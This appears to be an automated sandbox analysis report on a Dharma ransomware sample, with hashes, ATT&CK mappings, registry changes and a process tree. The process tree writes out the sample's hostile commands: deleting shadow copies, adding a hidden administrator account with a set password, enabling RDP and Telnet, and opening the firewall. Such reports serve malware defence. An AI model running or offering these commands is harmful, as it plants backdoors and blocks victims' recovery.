6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-11-2024 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dharma.exe
Size

11.5MB
MD5

928e37519022745490d1af1ce6f336f7
SHA1

b7840242393013f2c4c136ac7407e332be075702
SHA256

6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
SHA512

8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
SSDEEP

196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W

Score

9^/10

defense_evasion discovery evasion execution impact lateral_movement persistence privilege_escalation ransomware

Malware Config

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

Processes:

net.exenet1.exe

pid	Process
2624	net.exe
2396	net1.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
1532	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
1280	attrib.exe

Sets service image path in registry 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mssql.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\dzuchbjunjbltldu\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\ac\\dzuchbjunjbltldu.sys"	mssql.exe

Executes dropped EXE 5 IoCs

Processes:

nc123.exemssql.exemssql2.exeSearchHost.exe

pid	Process
2896	nc123.exe
2872	mssql.exe
1164
2948	mssql2.exe
2932	SearchHost.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

Processes:

mssql.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dzuchbjunjbltldu.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SAFEBOOT\MINIMAL\DZUCHBJUNJBLTLDU.SYS	mssql.exe

Loads dropped DLL 13 IoCs

Processes:

Dharma.exe

pid	Process
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe
2512	Dharma.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

SearchHost.exe

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid	Process
1224	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

nc123.exevssadmin.exeWMIC.exenet.execmd.execmd.exereg.exeWMIC.exeSearchHost.exereg.execmd.exenet.exesc.exefind.exenet1.exereg.exeDharma.exenet.execmd.exenet1.exenet1.exenetsh.exenet1.exeattrib.exenet.exenet1.execmd.exemssql2.exenet.exefind.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nc123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vssadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SearchHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dharma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mssql2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

Processes:

vssadmin.exe

pid	Process
1648	vssadmin.exe

Runs net.exe

Suspicious behavior: LoadsDriver 3 IoCs

Processes:

mssql.exe

pid	Process
2872	mssql.exe
2872	mssql.exe
2872	mssql.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mssql.exemssql2.exeWMIC.exevssvc.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	2872	mssql.exe
Token: SeLoadDriverPrivilege	2872	mssql.exe
Token: SeLoadDriverPrivilege	2872	mssql.exe
Token: SeLoadDriverPrivilege	2872	mssql.exe
Token: SeDebugPrivilege	2948	mssql2.exe
Token: SeIncreaseQuotaPrivilege	1704	WMIC.exe
Token: SeSecurityPrivilege	1704	WMIC.exe
Token: SeTakeOwnershipPrivilege	1704	WMIC.exe
Token: SeLoadDriverPrivilege	1704	WMIC.exe
Token: SeSystemProfilePrivilege	1704	WMIC.exe
Token: SeSystemtimePrivilege	1704	WMIC.exe
Token: SeProfSingleProcessPrivilege	1704	WMIC.exe
Token: SeIncBasePriorityPrivilege	1704	WMIC.exe
Token: SeCreatePagefilePrivilege	1704	WMIC.exe
Token: SeBackupPrivilege	1704	WMIC.exe
Token: SeRestorePrivilege	1704	WMIC.exe
Token: SeShutdownPrivilege	1704	WMIC.exe
Token: SeDebugPrivilege	1704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1704	WMIC.exe
Token: SeRemoteShutdownPrivilege	1704	WMIC.exe
Token: SeUndockPrivilege	1704	WMIC.exe
Token: SeManageVolumePrivilege	1704	WMIC.exe
Token: 33	1704	WMIC.exe
Token: 34	1704	WMIC.exe
Token: 35	1704	WMIC.exe
Token: SeBackupPrivilege	1724	vssvc.exe
Token: SeRestorePrivilege	1724	vssvc.exe
Token: SeAuditPrivilege	1724	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1704	WMIC.exe
Token: SeSecurityPrivilege	1704	WMIC.exe
Token: SeTakeOwnershipPrivilege	1704	WMIC.exe
Token: SeLoadDriverPrivilege	1704	WMIC.exe
Token: SeSystemProfilePrivilege	1704	WMIC.exe
Token: SeSystemtimePrivilege	1704	WMIC.exe
Token: SeProfSingleProcessPrivilege	1704	WMIC.exe
Token: SeIncBasePriorityPrivilege	1704	WMIC.exe
Token: SeCreatePagefilePrivilege	1704	WMIC.exe
Token: SeBackupPrivilege	1704	WMIC.exe
Token: SeRestorePrivilege	1704	WMIC.exe
Token: SeShutdownPrivilege	1704	WMIC.exe
Token: SeDebugPrivilege	1704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1704	WMIC.exe
Token: SeRemoteShutdownPrivilege	1704	WMIC.exe
Token: SeUndockPrivilege	1704	WMIC.exe
Token: SeManageVolumePrivilege	1704	WMIC.exe
Token: 33	1704	WMIC.exe
Token: 34	1704	WMIC.exe
Token: 35	1704	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2192	WMIC.exe
Token: SeSecurityPrivilege	2192	WMIC.exe
Token: SeTakeOwnershipPrivilege	2192	WMIC.exe
Token: SeLoadDriverPrivilege	2192	WMIC.exe
Token: SeSystemProfilePrivilege	2192	WMIC.exe
Token: SeSystemtimePrivilege	2192	WMIC.exe
Token: SeProfSingleProcessPrivilege	2192	WMIC.exe
Token: SeIncBasePriorityPrivilege	2192	WMIC.exe
Token: SeCreatePagefilePrivilege	2192	WMIC.exe
Token: SeBackupPrivilege	2192	WMIC.exe
Token: SeRestorePrivilege	2192	WMIC.exe
Token: SeShutdownPrivilege	2192	WMIC.exe
Token: SeDebugPrivilege	2192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2192	WMIC.exe
Token: SeRemoteShutdownPrivilege	2192	WMIC.exe
Token: SeUndockPrivilege	2192	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

SearchHost.exe

pid	Process
2932	SearchHost.exe

Suspicious use of SendNotifyMessage 1 IoCs

Processes:

SearchHost.exe

pid	Process
2932	SearchHost.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

mssql.exemssql2.exeSearchHost.exe

pid	Process
2872	mssql.exe
2948	mssql2.exe
2932	SearchHost.exe
2872	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Dharma.exenc123.execmd.execmd.execmd.exenet.exenet.exe

description	pid	Process	procid_target
PID 2512 wrote to memory of 2896	2512	Dharma.exe	31
PID 2512 wrote to memory of 2896	2512	Dharma.exe	31
PID 2512 wrote to memory of 2896	2512	Dharma.exe	31
PID 2512 wrote to memory of 2896	2512	Dharma.exe	31
PID 2512 wrote to memory of 2872	2512	Dharma.exe	33
PID 2512 wrote to memory of 2872	2512	Dharma.exe	33
PID 2512 wrote to memory of 2872	2512	Dharma.exe	33
PID 2512 wrote to memory of 2872	2512	Dharma.exe	33
PID 2896 wrote to memory of 2620	2896	nc123.exe	34
PID 2896 wrote to memory of 2620	2896	nc123.exe	34
PID 2896 wrote to memory of 2620	2896	nc123.exe	34
PID 2896 wrote to memory of 2620	2896	nc123.exe	34
PID 2512 wrote to memory of 2948	2512	Dharma.exe	35
PID 2512 wrote to memory of 2948	2512	Dharma.exe	35
PID 2512 wrote to memory of 2948	2512	Dharma.exe	35
PID 2512 wrote to memory of 2948	2512	Dharma.exe	35
PID 2512 wrote to memory of 2604	2512	Dharma.exe	36
PID 2512 wrote to memory of 2604	2512	Dharma.exe	36
PID 2512 wrote to memory of 2604	2512	Dharma.exe	36
PID 2512 wrote to memory of 2604	2512	Dharma.exe	36
PID 2512 wrote to memory of 1636	2512	Dharma.exe	38
PID 2512 wrote to memory of 1636	2512	Dharma.exe	38
PID 2512 wrote to memory of 1636	2512	Dharma.exe	38
PID 2512 wrote to memory of 1636	2512	Dharma.exe	38
PID 2512 wrote to memory of 2932	2512	Dharma.exe	40
PID 2512 wrote to memory of 2932	2512	Dharma.exe	40
PID 2512 wrote to memory of 2932	2512	Dharma.exe	40
PID 2512 wrote to memory of 2932	2512	Dharma.exe	40
PID 2604 wrote to memory of 1648	2604	cmd.exe	41
PID 2604 wrote to memory of 1648	2604	cmd.exe	41
PID 2604 wrote to memory of 1648	2604	cmd.exe	41
PID 2604 wrote to memory of 1648	2604	cmd.exe	41
PID 1636 wrote to memory of 1728	1636	cmd.exe	42
PID 1636 wrote to memory of 1728	1636	cmd.exe	42
PID 1636 wrote to memory of 1728	1636	cmd.exe	42
PID 1636 wrote to memory of 1728	1636	cmd.exe	42
PID 1728 wrote to memory of 1704	1728	cmd.exe	43
PID 1728 wrote to memory of 1704	1728	cmd.exe	43
PID 1728 wrote to memory of 1704	1728	cmd.exe	43
PID 1728 wrote to memory of 1704	1728	cmd.exe	43
PID 1728 wrote to memory of 2000	1728	cmd.exe	44
PID 1728 wrote to memory of 2000	1728	cmd.exe	44
PID 1728 wrote to memory of 2000	1728	cmd.exe	44
PID 1728 wrote to memory of 2000	1728	cmd.exe	44
PID 1636 wrote to memory of 2764	1636	cmd.exe	47
PID 1636 wrote to memory of 2764	1636	cmd.exe	47
PID 1636 wrote to memory of 2764	1636	cmd.exe	47
PID 1636 wrote to memory of 2764	1636	cmd.exe	47
PID 2764 wrote to memory of 2944	2764	net.exe	48
PID 2764 wrote to memory of 2944	2764	net.exe	48
PID 2764 wrote to memory of 2944	2764	net.exe	48
PID 2764 wrote to memory of 2944	2764	net.exe	48
PID 1636 wrote to memory of 2980	1636	cmd.exe	49
PID 1636 wrote to memory of 2980	1636	cmd.exe	49
PID 1636 wrote to memory of 2980	1636	cmd.exe	49
PID 1636 wrote to memory of 2980	1636	cmd.exe	49
PID 2980 wrote to memory of 2204	2980	net.exe	50
PID 2980 wrote to memory of 2204	2980	net.exe	50
PID 2980 wrote to memory of 2204	2980	net.exe	50
PID 2980 wrote to memory of 2204	2980	net.exe	50
PID 1636 wrote to memory of 988	1636	cmd.exe	51
PID 1636 wrote to memory of 988	1636	cmd.exe	51
PID 1636 wrote to memory of 988	1636	cmd.exe	51
PID 1636 wrote to memory of 988	1636	cmd.exe	51

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
1280	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Dharma.exe
"C:\Users\Admin\AppData\Local\Temp\Dharma.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2620
- C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe"
  2⤵
  - Sets service image path in registry
  - Executes dropped EXE
  - Impair Defenses: Safe Mode Boot
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2872
- C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ac\Shadow.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all
    3⤵
    - System Location Discovery: System Language Discovery
    - Interacts with shadow copies
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ac\systembackup.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1704
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:2000
- - C:\Windows\SysWOW64\net.exe
    net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2944
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators systembackup /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators systembackup /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:988
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2192
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:1156
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" systembackup /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    - System Location Discovery: System Language Discovery
    PID:2624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      System Location Discovery: System Language Discovery
      PID:2396
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no /maxpwage:unlimited
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      System Location Discovery: System Language Discovery
      PID:1084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2968
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2568
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
    3⤵
    - Hide Artifacts: Hidden Users
    - System Location Discovery: System Language Discovery
    PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\users\systembackup +r +a +s +h
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1280
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 3389 "Remote Desktop"
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1532
- - C:\Windows\SysWOW64\sc.exe
    sc config tlntsvr start=auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1224
- - C:\Windows\SysWOW64\net.exe
    net start Telnet
    3⤵
    - System Location Discovery: System Language Discovery
    PID:788
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Telnet
      4⤵
      System Location Discovery: System Language Discovery
      PID:1612
- C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe
  "C:\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2932

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ac\EVER\Everything.ini

Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\Shadow.bat

Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\dzuchbjunjbltldu.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac\systembackup.bat

Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
\Users\Admin\AppData\Local\Temp\ac\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
\Users\Admin\AppData\Local\Temp\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
memory/2512-91-0x0000000003DE0000-0x00000000044E2000-memory.dmp

Filesize
7.0MB

Download
memory/2512-92-0x0000000003DE0000-0x00000000044E2000-memory.dmp

Filesize
